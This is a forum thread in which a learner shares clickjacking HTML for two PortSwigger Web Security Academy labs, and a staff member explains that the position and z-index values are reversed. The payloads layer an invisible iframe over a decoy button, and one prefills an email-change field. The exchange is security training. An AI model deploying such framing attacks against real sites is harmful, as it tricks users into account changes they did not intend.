Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Clickjacking labs are not getting solved

MrNobody | Last updated: Feb 27, 2023 03:49PM UTC

I am trying to solve the clickjacking lab from Portswigger academy. I have made all the alignments according to the lab but still, it is not solved. LAB #1: Basic clickjacking with CSRF token protection <style> iframe{ position:absolute; width:1500px; height:1500px; opacity:0.001; z-index:2; } div{ position:relative; left:200px; top:560px; z-index:1; padding:20px 40px; } </style> <div>click</div> <iframe src="https://MY-LAB-ID.web-security-academy.net/my-account"></iframe> LAB#2: Clickjacking with form input data prefilled from a URL parameter <style> iframe{ position:absolute; height:1300px; width:1300px; opacity:0.001; z-index:1;} div{ position:relative; top:500px; left:125px; z-index:2; }</style> <div>Click me</div> <iframe src="https://MY-LAB-ID.web-security-academy.net/my-account?email=youare@hacked.com"></iframe> Please help me with that. PS: Yes I have put my lab id in place of 'MY-LAB-ID'.

MrNobody | Last updated: Feb 27, 2023 04:00PM UTC

One thing I noticed is that when I hover over the Div tag element, the cursor is not changing to the link cursor.

Ben, PortSwigger Agent | Last updated: Feb 28, 2023 09:47AM UTC

Hi, For both of these labs, it looks like you have mixed up the position attribute (the iframe needs to be relative and the div element needs to be absolute). For the 'Clickjacking with form input data prefilled from a URL parameter' lab you have also mixed up the z-index parameters - the iframe should be 2 and the div element should be 1.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.